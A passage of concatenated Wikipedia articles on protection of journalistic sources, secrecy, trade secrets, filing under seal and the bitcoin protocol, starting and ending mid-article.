recognition has not yet resulted in a critical mass of legal provisions Article 9 of theAfrican Charter of Human Rightsgives every person the right to receive information and express and disseminate opinions. The 2002 Declaration of Principles on Freedom of Expression in Africa, released by theAfrican Commission on Human and People's Rights, provided guidelines formember states of the African Unionon protection of sources: "XV Protection of Sources and other journalistic material Media practitioners shall not be required to reveal confidential sources of information or to disclose other material held for journalistic purposes except in accordance with the following principles: Noteworthy developments since 2007: TheAssociation of Southeast Asian Nations(ASEAN) adopted a Human Rights Declaration in November 2012 with general provisions for freedom of expression and privacy (ASEAN 2012).[64]Reservations have been voiced regarding the wording of provisions on human rights and fundamental freedoms in relation to political, economic and cultural systems and the Declaration's provisions on "balancing" rights with individual duties as well as an absence of reference that legitimate restrictions of rights must be provided by law and conform to strict tests of necessity and proportionality[65][66][67] In 2007, Banisar noted that: "A major recent concern in the region is the adoption of newanti-terrorism lawsthat allow for access to records and oblige assistance. There are also problems in many countries with searches ofnewsroomsand with broadly definedstate secretsacts which criminalize journalists who publish leaked information".[18] In Europe, theEuropean Court of Human Rightsstated in the 1996 case ofGoodwin v. United Kingdomthat "[p]rotection of journalistic sources is one of the basic conditions for press freedom ... Without such protection, sources may be deterred from assisting the press in informing the public on matters of public interest. As a result the vital public-watchdog role of the press may be undermined and the ability of the press to provide accurate and reliable information may be adversely affected."[68]The Court concluded that absent "an overriding requirement in the public interest", an order to disclose sources would violate the guarantee of free expression in Article 10[69]of theEuropean Convention on Human Rights. In the wake ofGoodwin, theCouncil of Europe's Committee of Ministers issued a Recommendation to its member states on how to implement the protection of sources in their domestic legislation.[70]TheOrganization for Security and Co-operation in Europehas also called on states to respect the right.[71] "The recognition of protection of journalistic sources is fairly well established in Europe both at the regional and domestic levels. For the most part, the protections seem to be respected by authorities...and direct demands to [expose] sources seem more the exception than the common practice". Banisar noted: "...There are still significant problems. Many of the national laws are limited in scope, or in the types of journalists that they protect. The protections are being bypassed in many countries by the use of searches of newsrooms and through increasing use of surveillance. There has also been an increase in the use of criminal sanctions against journalists, especially under national security grounds for receiving information from sources." Since then, European organizations and law-making bodies have made significant attempts at a regional level to identify the risks posed to source protection in the changing digital environment, and to mitigate these risks. In Bulgaria, Poland, and Romania unauthorized access to information by government entities were identified in several cases.[85]In those political regions, policies such as mandatory registration of pre-paid SIM mobile phone cards and government access toCCTVmake hacking tools and surveillance a lot easier. In the Netherlands, a 2006 case ruled that in cases of minimal national security interest do not supersede source confidentiality. Bart Mos and Joost de Haas, of the Dutch dailyDe Telegraaf. In an article in January 2006, the two journalists alleged the existence of aleakin theDutch secret servicesand quoted from what they claimed was an official dossier on Mink Kok, a notorious criminal. They further alleged that the dossier in question had fallen into the hands of Kok himself. A subsequent police investigation led to theprosecutionof Paul H., an agent accused of selling the file in question. Upon motions by the prosecution and the defence, the investigative judge in the case ordered the disclosure of the source for the news story, on the grounds that it was necessary to safeguardnational securityand ensure afair trialfor H. The two journalists were subsequently detained for refusing to comply with the disclosure order, but were released onappealafter three days, on November 30.The Haguedistrict court considered that the national security interest served by the order was minor and should not prevail over the protection of sources.[86] In the Americas, protection of sources has been recognized in theInter-American Declaration of Principles on Freedom of Expression,[87]which states in Principle 8 that "every social communicator has the right to keep his/her source of information, notes, personal and professional archives confidential." In theUnited States, unlikedoctor-patientorlawyer-clientconfidentiality, reporters are not afforded a similar legal shield. Communications between reporters and sources have been used by theFBIand otherlaw enforcement agenciesas an avenue to information about specific individuals or groups related to pendingcriminal investigations.[88] In the 1971 case ofBranzburg v. Hayesthe court ruled that reporter's privilege was not guaranteed by theFirst Amendment, but the publicity surrounding the case helped introduce the concept of reporter's privilege into public discussion. As a result of the case, Branzburg,a Kentucky reporter, was forced to testify about his sources and story to a grand jury.[3] AUniversity of Montanastudent, Linda Tracy, was issued asubpoenafor video she took of a violent encounter between police officers and a group of residents.[when?]The case, which was ultimately dismissed, involved attaining unedited footage of the encounter which part of was used in a documentary Linda Tracy made as for an undergraduate journalism class. Although she won the case, her status as a real journalist was called into question. Even with the victory, the court did not specifically address if protections and privacy extended to student journalists, but because of the nature of her intent and the project she could not be coerced to releasing the footage.[89]The case helped help further battles in student journalism and press freedoms at an educational level.[citation needed] TheElectronic Communications Privacy Actpassed in 1986 and protects bank transactions, telephone digits, and other information. The act also encompasses what organizations must provide to law enforcement with a subpoena, such as name, address, durations of services used, type of device used, and source of payment. This is known as “required disclosure” policies. It later included provisions to prohibit access to stored electronic devices.[90] Former CIA employeeEdward Snowdenfurther impacted the relationship between journalism, sources, and privacy. Snowden's actions as awhistleblowerat theNational Security Agencydrew attention to the extent of US government surveillance operations.[91]Surveillance by network administrators may include being able to view how many times a journalist or source visits a website per day, the information they are reading or viewing, and online applications they utilize. In Mexico, it is reported that the government there has spent $300 million during one year to surveil and gather information from the population with specific interest in journalists to get access to their texts, phone calls, and emails.[92] Under Canadian law journalists cannot be compelled to identify or disclose information likely to identify a journalistic source, unless a court of competent jurisdiction finds there is no other reasonable way to obtain the information in question, and that the public interest of administrating justice in the case outweighs the public interest of source protection.[93] In 2019, theSupreme Court of Canadaoverturned an order that would have required a journalist to disclose the source of her reporting on theSponsorship scandal, former cabinet ministerMarc-Yvan Côtéhad sought the order in a bid to have charges against him stayed, arguing that officials from an anti-corruption police unit had leaked information about the case to the press. The case was remitted back to theCourt of Quebecfor further consideration of new facts.[94] Newsrooms rely onend-to-end encryptiontechnologies to protect the confidentiality of their communications.[92]However, even these methods are not completely effective.[1] More schools of journalism are also beginning to include data and source protection and privacy into their curriculum.[91] Technologies used to protect source privacy includeSecureDrop,[95]GlobaLeaks,[96]Off-the-Record Messaging, theTails operating system, andTor.[91] Banisar wrote: "There are important declarations from theOrganisation of American States(OAS). Few journalists are ever required to testify on the identity of their sources. However direct demands for sources still occur regularly in many countries, requiring journalists to seek legal recourse in courts. There are also problems with searches of newsrooms and journalists' homes, surveillance and the use of national security laws". In 1997, the Hemisphere Conference on Free Speech staged inMexico Cityadopted the Chapultepec Declaration. Principle 3 states: "No journalist may be forced to reveal his or her sources of information."[97]Building on the Chapultepec Declaration, in 2000 theInter-American Commission on Human Rights(IACHR) approved the Declaration of Principles on Freedom of Expression as a guidance document for interpreting Article 13 of the Inter American Convention of Human Rights. Article 8 of the Declaration states: "Every social communicator has the right to keep his/her source of information, notes, personal and professional archives confidential."[98] There are developments with regards to the status of the above regional instruments since 2007: This article incorporates text from afree contentwork. Licensed under CC BY SA 3.0 IGO (license statement/permission). Text taken fromProtecting Journalism Sources in the Digital Age​, 193, Julie Posetti, UNESCO.
https://en.wikipedia.org/wiki/Protection_of_sources
TheSeal of the Confessional(alsoSeal of ConfessionorSacramental Seal) is aChristiandoctrine forbidding apriestfrom disclosing any information learned from a penitent duringConfession. This doctrine is recognized by severalChristian denominations:
https://en.wikipedia.org/wiki/Seal_of_the_Confessional_(disambiguation)
Secrecyis the practice of hiding information from certain individuals or groups who do not have the "need to know", perhaps while sharing it with other individuals. That which is kept hidden is known as the secret. Secrecy is often controversial, depending on the content or nature of the secret, the group or people keeping the secret, and the motivation for secrecy. Secrecy by government entities is often decried as excessive or in promotion of poor operation[by whom?]; excessive revelation of information on individuals can conflict with virtues ofprivacyandconfidentiality. It is often contrasted withsocial transparency. Secrecy can exist in a number of different ways: encoding orencryption(where mathematical and technical strategies are used to hide messages), true secrecy (where restrictions are put upon those who take part of the message, such as throughgovernment security classification)[citation needed]andobfuscation, where secrets are hidden in plain sight behind complex idiosyncratic language (jargon) orsteganography. Another classification proposed byClaude Shannonin 1948 reads that there are three systems of secrecy within communication:[1] Animalsconceal the location of theirdenornestfrompredators. Squirrels bury nuts, hiding them, and they try to remember their locations later.[2] Humansattempt to consciously conceal aspects of themselves from others due toshame, or fromfearof violence, rejection, harassment, loss ofacceptance, or loss ofemployment. Humans may also attempt to conceal aspects of their ownselfwhich they are not capable of incorporating psychologically into theirconsciousbeing.Familiessometimes maintain "family secrets", obliging family members never to discuss disagreeable issues concerning the family with outsiders or sometimes even within the family. Many "family secrets" are maintained by using a mutually agreed-upon construct (an official family story) when speaking with outside members. Agreement to maintain the secret is often coerced through "shaming" and reference to familyhonor. The information may even be something as trivial as arecipe.[citation needed] Secrets are sometimes kept to provide the pleasure of surprise. This includes keeping secret about asurprise party, not tellingspoilersof a story, and avoidingexposureof a magic trick.[citation needed] Keeping one'sstrategysecret– is important in many aspects ofgame theory.[citation needed] Inanthropologysecret sharing is one way for people to establish traditional relations with other people.[3]A commonly used[citation needed]narrative that describes this kind of behavior isJoseph Conrad's short story "The Secret Sharer".[citation needed] Governmentsoften attempt to conceal information from other governments and the public. These state secrets can includeweapondesigns, military plans,diplomaticnegotiationtactics, and secrets obtained illicitly from others ("intelligence"). Most nations have some form ofOfficial Secrets Act(theEspionage Actin the U.S.) and classify material according to the level of protection needed (hence the term "classified information"). An individual needs asecurity clearancefor access and other protection methods, such as keeping documents in asafe, are stipulated.[4] Few people dispute the desirability of keepingCritical Nuclear Weapon Design Informationsecret, but many believe government secrecy to be excessive and too often employed for political purposes. Many countries have laws that attempt to limit government secrecy, such as the U.S.Freedom of Information Actandsunshine laws. Government officials sometimesleakinformation they are supposed to keep secret. (For a recent (2005) example, seePlame affair.)[5] Secrecy in elections is a growing issue, particularly secrecy of vote counts on computerized vote counting machines. While voting, citizens are acting in a unique sovereign or "owner" capacity (instead of being a subject of the laws, as is true outside of elections) in selecting their government servants. It is argued that secrecy is impermissible as against the public in the area of elections where the government gets all of its power and taxing authority. In any event, permissible secrecy varies significantly with the context involved.[citation needed] Organizations, ranging from multi-national for profitcorporationsto nonprofitcharities, keep secrets forcompetitive advantage, to meet legal requirements, or, in some cases, to conceal nefarious behavior.[citation needed]New products under development, unique manufacturing techniques, or simply lists of customers are types of information protected bytrade secretlaws. Research on corporate secrecy has studied the factors supporting secret organizations.[6]In particular, scholars in economics and management have paid attention to the way firms participating in cartels work together to maintain secrecy and conceal their activities from antitrust authorities.[7]The diversity of the participants (in terms of age and size of the firms) influences their ability to coordinate to avoid being detected. Thepatentsystem encourages inventors to publish information in exchange for a limited timemonopolyon its use, though patent applications are initially secret.Secret societiesuse secrecy as a way to attract members by creating a sense of importance.[citation needed] Shell companiesmay be used to launder money from criminal activity, to finance terrorism, or to evade taxes. Registers ofbeneficial ownershipaim at fighting corporate secrecy in that sense.[8] Other lawsrequireorganizations to keep certain information secret, such asmedical records(HIPAAin the U.S.), orfinancial reportsthat are under preparation (to limitinsider trading). Europe has particularly strict laws aboutdatabaseprivacy.[9] Preservation of secrets is one of the goals ofinformation security. Techniques used includephysical securityandcryptography. The latter depends on the secrecy ofcryptographic keys. Many believe that security technology can be more effective if it itself is not kept secret.[10] Information hidingis a design principle in muchsoftware engineering. It is considered easier to verify software reliability if one can be sure that different parts of the program can only access (and therefore depend on) a known limited amount of information.[citation needed] Military secrecy is the concealing of information about martial affairs that is purposely not made available to the general public and hence to any enemy, in order to gain an advantage or to not reveal a weakness, to avoidembarrassment, or to help inpropagandaefforts. Most military secrets are tactical in nature, such as the strengths and weaknesses ofweapon systems,tactics, training methods, plans, and the number and location of specific weapons. Some secrets involve information in broader areas, such as secure communications,cryptography, intelligence operations, and cooperation with third parties.[11] US Governmentrights in regard to military secrecy were uphold in thelandmark legal caseofUnited States v. Reynolds, decided by theSupreme Courtin 1953.[12] Excessive secrecy is often cited[13]as a source of much human conflict. One may have toliein order to hold a secret, which might lead topsychologicalrepercussions.[original research?]The alternative, declining to answer when asked something, may suggest the answer and may therefore not always be suitable for keeping a secret. Also, the other may insist that one answer the question.[improper synthesis?] Nearly 2500 years ago,Sophocles[who?]wrote: 'Do nothing secretly; for Time sees and hears all things, and discloses all.'.[citation needed]Gautama Siddharthasaid: "Three things cannot long stay hidden: thesun, themoonand thetruth.".
https://en.wikipedia.org/wiki/Secrecy
Atrade secretis a form ofintellectual property(IP) comprising confidential information that is not generally known or readily ascertainable, derives economic value from its secrecy, and is protected by reasonable efforts to maintain its confidentiality.[1][2][3]Well-known examples include theCoca-Cola formulaand the recipe forKentucky Fried Chicken. Unlike other forms of IP, trade secrets do not require formal registration and can be protected indefinitely, as long as they remain undisclosed.[4]Instead,non-disclosure agreements(NDAs), among other measures, are commonly used to keep the information secret.[5][6] Like other IP assets, trade secrets may be sold or licensed.[7]Unauthorized acquisition, use, or disclosure of a trade secret by others in a manner contrary to honest commercial practices is considered misappropriation of the trade secret. If trade secretmisappropriationhappens, the trade secret holder can seek variouslegal remedies.[7] The precise definition of a trade secret varies byjurisdiction, as do the types of information eligible trade secret protection. However, in general, trade secrets are confidential information that is: All three elements are required. If any element ceases to exist, then the trade secret will also cease to exist.[4] Trade secret protection covers confidential information, which can include technical and scientific data, business and commercial information, and financial records.[3]Even “negative” information, like failed experiments, can be valuable by helping companies avoid repeating costly mistakes.[3] In international law, while "trade secrets" and "confidential information" are often used interchangeably, trade secrets are technically a subset of confidential information.[8]To qualify as a trade secret, confidential information must meet the specific requirements set by a country's national laws, which are often influenced by Article 39 of theTRIPS Agreement.[8][9] Commentators likeA. Arthur Schillerhave argued that trade secrets were protected underRoman lawby a claim known asactio servi corrupti, meaning an "action for making a slave worse" or "an action for corrupting a servant." The Roman law is described as follows: [T]he Roman owner of a mark or firm name was legally protected against unfair usage by a competitor through theactio servi corrupti... which the Roman jurists used to grant commercial relief under the guise of private law actions. "If, as the writer believes [writes Schiller], various private cases of action were available in satisfying commercial needs, the state was acting in exactly the same fashion as it does at the present day."[10] The suggestion that trade secret law has its roots in Roman law was introduced in 1929 in aColumbia Law Reviewarticle called "Trade Secrets and the Roman Law: TheActio Servi Corrupti", which has been reproduced in Schiller's,An American Experience in Roman Law1 (1971). However, theUniversity of Georgia Law SchoolprofessorAlan Watsonargued inTrade Secrets and Roman Law: The Myth Explodedthat theactio servi corruptiwas not used to protect trade secrets. Rather, he explained: Schiller is sadly mistaken as to what was going on. ... Theactio servi corruptipresumably or possibly could be used to protect trade secrets and other similar commercial interests. That was not its purpose and was, at most, an incidental spin-off. But there is not the slightest evidence that the action was ever so used. In this regard theactio servi corruptiis not unique. Exactly the same can be said of many private law actions including those for theft, damage to property, deposit, and production of property. All of these could, I suppose, be used to protect trade secrets, etc., but there is no evidence they were. It is bizarre to see any degree the Romanactio servi corruptias the counterpart of modern law for the protection of trade secrets and other such commercial interests.[10] Modern trade secret law is primarily rooted in Anglo-Americancommon law.[11](p6)The earliest recorded court case was the 1817 English caseNewbery v. James,which involved a secret formula for gout treatment.[12][11](p5)[13]In the United States, this concept was first recognized in the 1837 caseVickery v. Welch, involving the sale of a chocolate factory and the seller’s agreement to keep the secret recipe confidential.[14][15] NewberyandVickeryonly awarded compensation for losses (damages) and did not issue orders to prevent the misuse of secrets (injunctive relief).[11](p5)The first English case involving injunctive relief wasYovatt v. Winyardin 1820, where the court issued an injunction to prevent a former employee from using or disclosing recipes he had secretly copied from his employer's veterinary medicine practice.[16][17] In the United States, the 1868 Massachusetts Supreme Court decision inPeabody v. Norfolkis one of the most well-known and well-reasoned early trade secret case, establishing foundational legal principles that continue to be central to common law.[18][19]In this case, the court ruled that Peabody’s confidential manufacturing process was a protectable trade secret and issued an injunction preventing former employees from using or disclosing it after they shared it with a competitor.[18] In 1939, theRestatement of Torts,published by theAmerican Law Institute, offered, among other things, one of the earliest formal definitions of a trade secret. According to Section 757, Comment b, a trade secret may consist of "any formula, pattern, device, or compilation of information which is used in one's business, and which gives the business an opportunity to obtain an advantage over competitors who do not know or use it."[20](p278)This definition became widely used by courts across the United States.[20](p278)As the first attempt to outline the accepted principles of trade secret law, theRestatementserved as the primary authority adopted in virtually every reported case.[20](p282) Trade secret law saw further development in 1979 when theUniform Law Commission(ULC) introduced a model law known as theUniform Trade Secrets Act(UTSA), which was later amended in 1985. The UTSA defines the types of information eligible for trade secret protection, establishes a private cause of action for misappropriation, and outlines remedies such as injunctions, damages, and, in certain cases, attorneys' fees.[21]It has since been adopted by 48 states, along with the District of Columbia, Puerto Rico, and the U.S. Virgin Islands, with New York and North Carolina as the exceptions.[22][23] The UTSA influenced theDefend Trade Secrets Act(DTSA) of 2016, which created a federal civilcause of actionfor trade secret misappropriation, allowing plaintiffs to file cases directly in federal courts if "the trade secret is related to a product or service used in ... interstate or foreign commerce."[23] Trade secret law is governed by national legal systems.[24]However, international standards for protecting secrets (called “undisclosed information”) were established as part of theTRIPS Agreementin 1995.[24]Article 39 of TRIPS obligates member countries to protect “undisclosed information” from unauthorized use conducted “in a manner contrary to honest commercial practices,” including actions such as breach of contract, breach of confidence, and unfair competition. For the information to qualify, it must not be generally known or easily accessible, must hold value due to its secrecy, and must be safeguarded through “reasonable steps” to keep it secret.[24][25] Trade secrets are an important, but invisible component of a company'sintellectual property(IP). Their contribution to a company's value can be major.[26]Being invisible, that contribution is hard to measure.[27]Still, research shows that changes in trade secrets laws affect business spending onR&Dandpatents.[28][29]This research provides indirect evidence of the value of trade secrecy. Unlike other forms ofintellectual property, trade secrets do not require formal registration and can be protected indefinitely, as long as they remain secret.[4]Maintaining secrecy is both a practical necessity and a legal obligation, as trade secret owners must take "reasonable" measures to protect the confidentiality of their trade secrets to qualify for legal protection.[30](p4)"Reasonable" efforts are decided case by case, considering factors like the type and value of the secret, its importance to the business, the company’s size, and its organizational complexity.[30](p4) The most common reason for trade secret disputes to arise is when former employees of trade secret-bearing companies leave to work for a competitor and are suspected of taking or using valuable confidential information belonging to their former employer.[31]Legal protections includenon-disclosure agreements(NDAs), andwork-for-hireandnon-compete clauses. In other words, in exchange for an opportunity to be employed by the holder of secrets, an employee may agree to not reveal their prospective employer's proprietary information, to surrender or assign to their employer ownership rights to intellectual work and work-products produced during the course (or as a condition) of employment, and to not work for a competitor for a given period of time (sometimes within a given geographic region). Violating the agreement generally carries the possibility of heavy financial penalties, thus disincentivizing the revealing of trade secrets. Trade secret information can be protected through legal action including an injunction preventingbreaches of confidentiality, monetary damages, and, in some instances, punitive damages and attorneys’ fees too. In extraordinary circumstances, anex parte seizureunder theDefend Trade Secrets Act(DTSA) also allows for the court to seize property to prevent the propagation or dissemination of the trade secret.[31] However, proving a breach of an NDA by a former stakeholder who is legally working for a competitor or prevailing in a lawsuit for breaching a non-compete clause can be very difficult.[32]A holder of a trade secret may also require similar agreements from other parties, such as vendors, licensees, and board members. As a company can protect its confidential information through NDA, work-for-hire, and non-compete contracts with its stakeholders (within the constraints of employment law, including only restraint that is reasonable in geographic- and time-scope), these protective contractual measures effectively create a monopoly on secret information that does not expire as would apatentorcopyright. The lack of formal protection associated with registered intellectual property rights, however, means that a third party not bound by a signed agreement is not prevented from independently duplicating and using the secret information once it is discovered, such as throughreverse engineering. Therefore, trade secrets such as secret formulae are often protected by restricting the key information to a few trusted individuals. Famous examples of products protected by trade secrets areChartreuse liqueurandCoca-Cola.[33] Because protection of trade secrets can, in principle, extend indefinitely, it may provide an advantage over patent protection and other registered intellectual property rights, which last for a limited duration. For example, the Coca-Cola company has no patent for theformula of Coca-Colaand has been effective in protecting it for many more years than the 20 years of protection that a patent would have provided. In fact, Coca-Cola refused to reveal its trade secret under at least two judges' orders.[34] Trade secret legal protection can reduce the knowledge spillover, which enhances the knowledge spread and technology improvement.[35]Therefore, while trade secret laws strengthen R&D exclusivity and encourage firms to engage in innovative activities, broadly reducingknowledge spilloverscan harm economic growth. In general, trade secret misappropriation occurs when someone improperly acquires, discloses, or uses a trade secret without the trade secret holder's consent.[36][37][38]Common scenarios include former employees taking proprietary data to a new employer in violation ofnon-disclosure agreements(NDAs), espionage, or unauthorized disclosure.[39][36][40] To prove misappropriation, the trade secret holder must generally show—subject to the specific requirements of the applicable jurisdiction—that: While the improper, dishonest, or unlawful acquisition, use, or disclosure of trade secret information by unauthorized third parties is generally prohibited, there are exceptions to this rule. The scope of these exceptions and limitations varies across jurisdictions: InCommonwealthcommon lawjurisdictions, confidentiality and trade secrets are regarded as anequitableright rather than apropertyright.[44] TheCourt of Appeal of England and Walesin the case ofSaltman Engineering Co Ltd v. Campbell Engineering Ltd[45]held that the action for breach of confidence is based on a principle of preserving "good faith". The test for a cause of action for breach of confidence in thecommon lawworld is set out in the case ofCoco v. A.N. Clark (Engineers) Ltd:[46] The "quality of confidence" highlights that trade secrets are a legal concept. With sufficient effort or through illegal acts (such as breaking and entering), competitors can usually obtain trade secrets. However, so long as the owner of the trade secret can prove that reasonable efforts have been made to keep the information confidential, the information remains a trade secret and generally remains legally protected. Conversely, trade secret owners who cannot evidence reasonable efforts at protecting confidential information risk losing the trade secret, even if the information is obtained by competitors illegally. It is for this reason that trade secret owners shred documents and do not simply recycle them.[citation needed] A successful plaintiff is entitled to various forms ofjudicial relief, including: Hong Kongdoes not follow the traditional commonwealth approach, instead recognizing trade secrets where a judgment of the High Court indicates that confidential information may be a property right.[47] The EU adopted aDirective on the Protection of Trade Secretson 27 May 2016.[48]The goal of the directive is to harmonize the definition of trade secrets in accordance with existing international standards, and the means of obtaining protection of trade secrets within the EU.[48] Unlike other protections, like in the US, the trade secrets in the EU are not absolutely seen as an IP right, as it gives the holder no exclusive rights. It is more a protection against the unfair use or publication of the secret information.[48] Within the U.S., trade secrets generally encompass a company's proprietary information that is not generally known to its competitors, and which provides the company with a competitive advantage.[49] Although trade secrets law evolved under state common law, prior to 1974, the question of whether patent law preempted state trade secrets law had been unanswered. In 1974, theUnited States Supreme Courtissued the landmark decision,Kewanee Oil Co. v. Bicron Corp.,which resolved the question in favor of allowing the states to freely develop their own trade secret laws.[50] In 1979, several U.S. states adopted theUniform Trade Secrets Act(UTSA), which was further amended in 1985, with approximately 47 states having adopted some variation of it as the basis for trade secret law. Another significant development is theEconomic Espionage Act (EEA) of 1996(18 U.S.C.§§ 1831–1839), which makes the theft or misappropriation of a trade secret a federal crime. This law contains two provisions criminalizing two sorts of activity: The statutory penalties are different for the two offenses. The EEA was extended in 2016 to allow companies to file civil suits in federal court.[51] On May 11, 2016, President Obama signed theDefend Trade Secrets Act(DTSA), 18 U.S.C. §§ 1839 et seq., which for the first time created a federal cause of action for misappropriating trade secrets.[52]The DTSA provides for both a private right of action for damages and injunction and a civil action for injunction brought by the Attorney General.[53] The statute followed state laws on liability in significant part, defining trade secrets in the same way as the Uniform Trade Secrets Act as, "all forms and types of financial, business, scientific, technical, economic, or engineering information, including patterns, plans, compilations, program devices, formulas, designs, prototypes, methods, techniques, processes, procedures, programs, or codes, whether tangible or intangible, and whether or how stored, compiled, or memorialized physically, electronically, graphically, photographically, or in writing if (A) the owner thereof has taken reasonable measures to keep such information secret; and (B) the information derives independent economic value, actual or potential, from not being generally known to, and not being readily ascertainable through proper means by, another person who can obtain economic value from the disclosure or use of the information." However, the law contains several important differences from prior law: The DTSA also clarifies that a United States resident (including a company) can be liable for misappropriation that takes place outside the United States, and any person can be liable as long as an act in furtherance of the misappropriation takes place in the United States, 18 U.S.C. §1837. The DTSA provides the courts with broad injunctive powers. 18 U.S.C. §1836(b)(3). The DTSA does not preempt or supplant state laws, but provides an additional cause of action. Because states vary significantly in their approach to the "inevitable disclosure" doctrine,[54]its use has limited, if any, application under the DTSA, 18 U.S.C.§1836(b)(3)(A).[55] In the United States, trade secrets are not protected by law in the same way aspatentsortrademarks. While the US Constitution explicitlyauthorizesthe existence of and the federal jurisdiction overpatentsandcopyrights, it is silent on trade secrets,trademarks, etc. For this reason, Federal Law for the latter types of intellectual property is based on theCommerce Clause(rather than theCopyright Clause) under a theory, that these IP types are used forinterstate commerce. On other hand, the application of the Interstate Commerce Theory did not find much judicial support in regulating trade secrets: since a trade secret process is used in a State, where it is protected by state law, federal protection may be needed only whenindustrial espionageby a foreign entity is involved (given that the States themselves cannot regulate commerce with foreign powers). Due to these Constitutional requirements, patents and trademarks enjoy a strong federal protection in the USA (theLanham ActandPatent Act, respectively), while trade secrets usually have to rely on more limitedstate laws. Most states have adopted theUniform Trade Secrets Act(UTSA), except forMassachusetts,New York, andNorth Carolina. However, since 2016 with the enactment of theDefend Trade Secrets Act(DTSA), some additional trade secrets protection has become also available under federal law. One of the differences between patents and trademarks, on the one hand, and trade secrets, on the other, is that a trade secret is protected only when the owner has taken reasonable measures to protect the information as a secret (see18 U.S.C.§ 1839(3)(A)). Nations have different trademark policies. Assuming the mark in question meets certain other standards of protectibility, trademarks are generally protected from infringement on the grounds that other uses might confuse consumers as to the origin or nature of the goods once the mark has been associated with a particular supplier. Similar considerations apply toservice marksandtrade dress. By definition, a trademark enjoys no protection (quatrademark) until and unless it is "disclosed" to consumers, for only then are consumers able to associate it with a supplier or source in the requisite manner. (That a company plans tousea certain trademark might itself be protectable as a trade secret, however, until the mark is actually made public.)[56]To acquire atrademark rights under U.S. law, one must simply use the mark "in commerce".[57]It is possible to register a trademark in the United States, both at the federal and state levels. Registration of trademarks confers some advantages, including stronger protection in certain respects, but registration is not required in order to get protection.[57]Registration may be required in order to file a lawsuit for trademark infringement. To acquire a patent,enablinginformation about the method or product has to be supplied to a patent office and upon publication (usually, years before issuance of a patent), it becomes available to all. After expiration of the patent, competitors can copy the method or product legally. The most important advantage of patents (compared to trade secrets) is that patents assure the monopoly of their owners, even when the patented subject matter is independently invented by others later (there aresome exceptions), as well as when the patented subject matter was invented by others prior to the patent'spriority date, kept as a trade secret, and used by the other in its business. Although it is legally possible to "convert" a trade secret into a patent, the claims in such patent would be limited to things, that are easily discernable from examining such things. This means, thatcompositions of matterandarticles of manufacturecan not be patented after they become available to public, whileprocessescan. The temporarymonopolyon the patented invention is regarded as apay-offfor disclosing the information to the public.[citation needed]In order to obtain a patent, the inventor mustdisclose the invention, so that others will be able to both make and use the invention. Often, an invention will be improved after filing of the patent application, and additional information will be learned. None of that additional information must be disclosed through the patent application process, and it may thus be kept as a trade secret.[58]That nondisclosed information will often increase the commercial viability of the patent. Most patent licenses include clauses that require the inventor to disclose any trade secrets they have, and patent licensors must be careful to maintain their trade secrets while licensing a patent through such means as the use of anon-disclosure agreement. Compared to patents, the advantages of trade secrets are that a trade secret is not time limited (it "continues indefinitely as long as the secret is not revealed to the public", whereas a patent is only in force for a specified time, after which others may freely copy the invention), a trade secret does not imply any registration costs,[59]has an immediate effect, does not require compliance with any formalities, and does not imply any disclosure of the invention to the public.[59]The disadvantages of trade secrets include that "others may be able to legally discover the secret and be thereafter entitled to use it", "others may obtain patent protection for legally discovered secrets", and a trade secret is more difficult to enforce than a patent.[60] TheFreedom of Information Actof 1966 (FOIA), which requires federal agencies to provide documents to the public on request, includes a discretionary exemption for trade secrets.[61]Thus, trade secret regulations can mask the composition of chemical agents inconsumer products, which has long been criticized for allowing the trade secret holders to hide the presence of potentially harmful andtoxic substances. It has been argued that the public is being denied a clear picture of such products' safety, whereas competitors are well positioned to analyze its chemical composition.[62]In 2004, the National Environmental Trust tested 40 common consumer products; in more than half of them they found toxic substances not listed on theproduct label.[62]
https://en.wikipedia.org/wiki/Trade_secret
Filing under sealis a procedure allowing sensitive or confidential information to be filed with a court without becoming a matter ofpublic record.[1]The court generally must give permission for the material to remain under seal.[2] Filing confidential documents "under seal" separated from the public records allowslitigantsto navigate the judicial system without compromising their confidentiality, at least until there is an affirmative decision by consent of the information's owner or by order of the court to publicize it.[2] When the document is filed under seal, it should have a clear indication for thecourt clerkto file it separately – most often by stamping words "Filed Under Seal" on the bottom of each page. The person making the filing should also provide instructions to the court clerk that the document needs to be filed "under seal". Courts often have specific requirements for these filings in their Local Rules.[3] Normally records should not be filed under seal without court permission.[3]However,Federal Rule of Civil Procedure5.2 allows a person making a redacted filing to also file an unredacted copy under seal.[4] Thislegal termarticle is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Under_seal
Thebitcoin protocolis theset of rulesthat govern the functioning ofbitcoin. Its key components and principles are: apeer-to-peerdecentralized network with no central oversight; theblockchaintechnology, a publicledgerthat records all bitcoin transactions;miningandproof of work, the process to create new bitcoins and verify transactions; and cryptographic security. Users broadcastcryptographically signedmessages to the network using bitcoincryptocurrency walletsoftware. These messages are proposed transactions, changes to be made in the ledger. Each node has a copy of the ledger's entire transaction history. If a transaction violates the rules of the bitcoin protocol, it is ignored, as transactions only occur when the entire network reaches a consensus that they should take place. This "full network consensus" is achieved when each node on the network verifies the results of aproof-of-workoperation calledmining. Mining packages groups of transactions into blocks, and produces ahash codethat follows the rules of the bitcoin protocol. Creating this hash requires expensiveenergy, but a network node can verify the hash is valid using very little energy. If a miner proposes a block to the network, and its hash is valid, the block and its ledger changes are added to the blockchain, and the network moves on to yet unprocessed transactions. In case there is a dispute, then the longest chain is considered to be correct. A new block is created every 10 minutes, on average. Changes to the bitcoin protocol require consensus among the network participants. The bitcoin protocol has inspired the creation of numerous other digital currencies and blockchain-based technologies, making it a foundational technology in the field ofcryptocurrencies. Blockchaintechnology is a decentralized and secure digital ledger that records transactions across a network of computers. It ensures transparency, immutability, and tamper resistance, making data manipulation difficult. Blockchain is the underlying technology for cryptocurrencies like bitcoin and has applications beyond finance, such as supply chain management and smart contracts.[1] The network requires minimal structure to share transactions. Anad hocdecentralized network of volunteers is sufficient. Messages are broadcast on abest-effortbasis, and nodes can leave and rejoin the network at will. Upon reconnection, a node downloads and verifies new blocks from other nodes to complete its local copy of the blockchain.[2][3] Bitcoin uses a proof-of-work system or a proof-or-transaction to form a distributed timestamp server as apeer-to-peer network.[3]This work is often calledbitcoin mining. During mining, practically all of the computing power of the bitcoin network is used to solve cryptographic tasks, which is proof of work. Their purpose is to ensure that the generation of valid blocks involves a certain amount of effort so that subsequent modification of the blockchain, such as in the 51% attack scenario, can be practically ruled out. Because of the difficulty, miners form "mining pools" to get payouts despite these high power requirements, costly hardware deployments, and hardware under control. As a result of the Chinese ban on bitcoin mining in 2021, the United States currently holds the largest share of bitcoin mining pools.[4][5] Requiring a proof of work to accept a new block to the blockchain wasSatoshi 